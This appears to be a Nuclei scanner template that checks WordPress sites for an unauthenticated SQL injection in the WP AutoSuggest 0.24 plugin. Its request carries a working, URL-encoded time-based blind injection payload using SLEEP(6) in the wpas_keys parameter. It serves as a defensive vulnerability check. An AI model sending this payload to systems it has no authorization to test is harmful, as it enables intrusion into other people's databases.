id: wp-autosuggest-sql-injection info: name: WP AutoSuggest 0.24 - SQL Injection author: theamanrawat severity: critical description: | The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability. reference: - https://wpscan.com/vulnerability/9188 - https://wordpress.org/plugins/wp-autosuggest/ metadata: verified: true max-request: 1 tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ" matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/xml")' - 'contains(body, "")' condition: and # digest: 4a0a00473045022060417b5ebdec2ec0103ca4f4228b756927a5690e6fc099a7e4c37d7f2d0ab65f02210091f60ecf3280dec392b74b837bf8b91cae3f0ce21f5820f9af5c3f2e7eed0683:922c64590222798bb761d5b6d8e72950